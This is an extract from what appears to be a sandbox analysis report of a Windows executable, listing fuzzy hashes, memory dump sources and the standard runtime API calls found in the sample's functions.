                                                                                                                                                                                                                                        • Instruction ID: ac44544cc5874b3f8668d400e7b1d8baa98efb62a1c43fb480bd42e23526bd6d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2e6723cdeca0bf20eb010487266b358ed56464ffee74bae4bf3453a537943f6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E91AEB56083018FC704EF28D881A2FB7E6AFD9354F14891AF899C7316E735EA448F52
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a64ce13e5c7f42a642a3fe29622a59d9ba5460d94fcab422006ed87866ba3a19
                                                                                                                                                                                                                                        • Instruction ID: d3daa07abedb8d472c27b1abf674aa5b5ff74fb735b1246d1e12ecfb0811fdb4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a64ce13e5c7f42a642a3fe29622a59d9ba5460d94fcab422006ed87866ba3a19
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B719F26705B018F9B1C892988E56EF37E3DBD5350F1AC82ED84DCB346C7368C498B91
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 88117000eb69edac0fd5fa488cbd40a25ed272ff98d8b69b93dfc7fb8d18b801
                                                                                                                                                                                                                                        • Instruction ID: 78138bcd3e7c6cefaccf6f20886c103df9fc2ff1fc22452dafb97f9f6966bc33
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88117000eb69edac0fd5fa488cbd40a25ed272ff98d8b69b93dfc7fb8d18b801
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D61CF3A61D3084B9F28A5A858D97FE37D25B90314F25C92ED80DEF7A2EB274C458781
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 15c905fea7c5e9a35d98acdba0ed43405a48e28e374087c1e875655055c33e0c
                                                                                                                                                                                                                                        • Instruction ID: c94079d9d1f81989f16d7cd7c9e7afc35053b97c4bcaab30ad9c022c0d6c28de
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15c905fea7c5e9a35d98acdba0ed43405a48e28e374087c1e875655055c33e0c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5716A6A709B018FDB188D2888E42AF7BD3D7D5360F19D52AE85EC7281C7768C4A4B61
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: d8dea1a939fbda6c6209710bbf8be60717a83f7a7487588bc844486a285c620d
                                                                                                                                                                                                                                        • Instruction ID: 1f7631beec6ada13055be0316b8eb251758bff1155cd468397db517269e3e8a0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d8dea1a939fbda6c6209710bbf8be60717a83f7a7487588bc844486a285c620d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4061493BB442108F4B14EA28DAC419E73D3D7D4321B2BCA65D895AB758DB30DE4B8F81
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a3290f780d5ec7b68348a79b626a7e8ace1dd1a1afee6ca1463fe080224fea06
                                                                                                                                                                                                                                        • Instruction ID: 6f1e47e6dd5c124892a4db45951209aa833325c6400f7883d0ebcca6757b45c9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3290f780d5ec7b68348a79b626a7e8ace1dd1a1afee6ca1463fe080224fea06
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C61DE76608B418FC708CF29C49266E77E2ABD8310F19C81EF88ACB249DB319C459B52
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 6e1a91dfbb7ac35a1234344c603047ab864453658260ba29b8650da59f997b4b
                                                                                                                                                                                                                                        • Instruction ID: 0a6e4e16edd0d4fb9843d4c5eed41a13b89eee76d464a6a88b3cf86863578f70
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e1a91dfbb7ac35a1234344c603047ab864453658260ba29b8650da59f997b4b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D51EF7A6043029FD708CF28D89976F73E5EB89310F65C829E889CB350DB35EC419B92
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a771fd7b82e906c5c26d1c0099c2d7841dca54f69e470e8fa2d2a5d60f954dca
                                                                                                                                                                                                                                        • Instruction ID: 0e76f315213e55398940c9e0e2e585a3f97a05de7d540e8945759907b3e46059
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a771fd7b82e906c5c26d1c0099c2d7841dca54f69e470e8fa2d2a5d60f954dca
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5051463BB443204F8B685D3848C52AA77E29BD6351F1AC91EFC89C7251D739CD8B9A81
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a3ce0da5c961ece3a07921b33a85493b1ddbe62d4c384ea251ddeccebe7e3e0d
                                                                                                                                                                                                                                        • Instruction ID: d7f1b01cd002528cb3bad744ca578f40e6388738f1f297916161b1b077dc1ac0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3ce0da5c961ece3a07921b33a85493b1ddbe62d4c384ea251ddeccebe7e3e0d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6451F7356082058FDB08CA38C8E57AF77E2DBC5715F14841DE88A8B391DB768C898B52
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fd4ffe939ec953dd1fbaba95fe5f058205597fb12a51eddf071f0ea044a3ccf8
                                                                                                                                                                                                                                        • Instruction ID: 97c527c69673e2c6e7881999f7f4dd68f2a58a633cf657477fa19cafbc001d35
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd4ffe939ec953dd1fbaba95fe5f058205597fb12a51eddf071f0ea044a3ccf8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5414A326043019BCB04CE2898A1AEF7BEAAFDA751F14891DF84957312DB358D57CF91
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 7a1d6b8c4b27e0a55d6501e70ac37412f8138333c165689d7c820008571965b5
                                                                                                                                                                                                                                        • Instruction ID: f4cac9d12599783e0753ae0ef41d1f18bc2f4684cac0c2d4c714ae4e77bd2e24
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a1d6b8c4b27e0a55d6501e70ac37412f8138333c165689d7c820008571965b5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8415A767002009BDB1496389C993EB77C3DBD1321F55C865E899CB292CB39CD8D8F91
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(001C0118,00000FA0,?,?,0018E8E5), ref: 0018EA33
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,0018E8E5), ref: 0018EA3E
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0018E8E5), ref: 0018EA4F
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0018EA61
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0018EA6F
                                                                                                                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0018E8E5), ref: 0018EA92
                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(001C0118,00000007,?,?,0018E8E5), ref: 0018EAB5
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,0018E8E5), ref: 0018EAC5
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • WakeAllConditionVariable, xrefs: 0018EA67
                                                                                                                                                                                                                                        • SleepConditionVariableCS, xrefs: 0018EA5B
                                                                                                                                                                                                                                        • kernel32.dll, xrefs: 0018EA4A
                                                                                                                                                                                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0018EA39
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                                                                                                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                        • API String ID: 2565136772-3242537097
                                                                                                                                                                                                                                        • Opcode ID: 789c6201ecd753474f2db51b6d4ec88a632db48410f393027ab343046902beab
                                                                                                                                                                                                                                        • Instruction ID: 6f2b8b22ce3a186f16b045dc05e742b49ebf0262220307d48b7e3d6610f21537
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 789c6201ecd753474f2db51b6d4ec88a632db48410f393027ab343046902beab
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0301F731B41311EFDB266BB5AD4DF667AD8AB94F41B084225FD09D3990DB70C980CBE1
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 0019DE12
                                                                                                                                                                                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 0019DF20
                                                                                                                                                                                                                                        • CatchIt.LIBVCRUNTIME ref: 0019DF71
                                                                                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 0019E072
                                                                                                                                                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 0019E08D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                        • API String ID: 4119006552-393685449
                                                                                                                                                                                                                                        • Opcode ID: 1108d99e781c4c663b17c57d2235160117ab3de69614ea9b305ac89e8983e0e5
                                                                                                                                                                                                                                        • Instruction ID: 6377c0f9b1467e370b84c73f150cf4a1f5e7e93717dbca214ca4b249e8b74aea
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1108d99e781c4c663b17c57d2235160117ab3de69614ea9b305ac89e8983e0e5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4B1AE71D00209EFCF29DFA4E8819AEBBB5FF24310F15406AF8156B212D771EA52CB91
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCPInfo.KERNEL32(02A15330,02A15330,00000000,7FFFFFFF,?,001AF1D5,02A15330,02A15330,00000000,02A15330,?,?,?,?,02A15330,00000000), ref: 001AF290
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 001AF34B
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 001AF3DA
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 001AF425
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 001AF42B
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 001AF461
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 001AF467
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 001AF477
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 127012223-0
                                                                                                                                                                                                                                        • Opcode ID: 1f85f257fd19d4506016d03835888604792583048f31b0d61e125fa693dcecb1
                                                                                                                                                                                                                                        • Instruction ID: 96b0ee49128dc6f6dbeaecdd1d51e9b070dd7b4c81a39fbc9a41bbb8bb208a2e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f85f257fd19d4506016d03835888604792583048f31b0d61e125fa693dcecb1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3771C37A900205ABEF219EE48C41BAF77A5AF5B350F69013EE854A7281D735DD42C7A0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00191644
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00191670
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 001916AF
                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001916CC
                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0019170B
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00191728
                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0019176A
                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0019178D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
